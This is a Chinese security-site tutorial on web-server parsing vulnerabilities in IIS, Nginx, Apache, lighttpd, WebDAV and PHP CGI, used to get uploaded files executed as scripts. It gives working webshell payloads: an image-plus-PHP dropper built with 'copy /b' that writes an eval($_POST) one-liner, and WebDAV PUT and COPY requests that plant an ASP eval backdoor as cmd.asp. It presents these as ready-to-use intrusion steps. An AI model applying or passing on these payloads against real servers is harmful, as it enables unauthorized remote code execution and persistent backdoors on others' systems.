ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全安全文章 → webshell解析漏洞

webshell解析漏洞

时间:2018-03-01 16:29:37人气:作者:本站作者我要评论

webshell解析漏洞

IIS 6.0解析漏洞

目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码

IIS6.0 会将 xx.jpg 解析为 asp 文件。

后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)

IIS6.0 都会把此类后缀文件成功解析为 asp 文件。

默认解析:/xx.asa /xx.cer /xx.cdx

IIS6.0 默认的可执行文件除了 asp 还包含这三种

此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

IIS 7.0/IIS 7.5/Nginx <=0.8.37 解析漏洞

在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.PHP会将 /xx.jpg/xx.php 解析为

php 文件。

常用利用方法: 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之

后,避免破坏图片文件头和尾

e.g. copy xx.jpg/b + yy.txt/a xy.jpg

/b 即二进制[binary]模式

/a 即ascii模式 xx.jpg正常图片文件

yy.txt 内容 <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cesafe])?>');?>

意思为写入一个内容为 <?php eval($_POST[cesafe])?> 名称为cesafe.php的文件

找个地方上传 cesafe.jpg ,然后找到 cesafe.jpg 的地址,在地址后加上 /xx.php 即可执行恶意文本。

然后就在图片目录下生成一句话木马 shell.php 密码 cmd

Nginx <=0.8.37 解析漏洞

在Fast-CGI关闭的情况下,Nginx <=0.8.37 依然存在解析漏洞

在一个文件路径(/xx.jpg)后面加上%00.php会将 /xx.jpg%00.php 解析为 php 文件。

Apache 解析漏洞

后缀解析:test.php.x1.x2.x3

Apache将从右至左开始判断后缀,若x3非可识别后缀,再判断x2,直到找到可识别后缀为止,然后

将该可识别后缀进解析

test.php.x1.x2.x3 则会被解析为php

经验之谈:php|php3|phtml 多可被Apache解析

Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.

比如 cracer.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把

cracer.php.owf.rar解析成php.

如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个

cracer.php.rara.jpg.png...去测试是否是合法后缀。

lighttpd 解析漏洞

xx.jpg/xx.php

WebDav漏洞

WebDav是一种基于HTTP1.1协议的通信协议,它扩展了HTTP协议。在开启WebDav后若

支持PUT、Move、Copy、Delete等方法,就会存在安全隐患。

测试步骤如下:

1)通过OPTIONS探测服务器所支持的HTTP方法

请求:

OPTIONS / HTTP/1.1

Host: http://www.xxxx.com

2)通过PUT方法向服务器上传shell

请求:

PUT /a.txt HTTP/1.1

Host: http://www.xxxx.com

Content-Length: 30

<%eval request("chopper") %>

3)通过Move或Copy方法改名

请求:

COPY /a.txt HTTP/1.1

Host: http://www.xxxx.com

Destination: http://www.xxxx.com/cmd.asp

4)用DELETE方法删除文件

请求:

DELETE /a.txt HTTP/1.1

Host: http://www.xxxx.com

PHP CGI解析漏洞

当php的配置文件中的选项cgi.fix_pathinfo = 1开启时,当访问http://www.xxx.com/x.txt/x.php

时,若x.php不存在,则PHP会递归向前解析,将x.txt当作php脚本来解析

IIS中:任意文件名/任意文件名.php就会被解析为php

Nginx中:任意文件名/任意文件名.php就会被解析为php

相关文章

猜你喜欢

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

本类推荐

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 琼ICP备2021004244号-1| 琼ICP备2021004244号-1

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网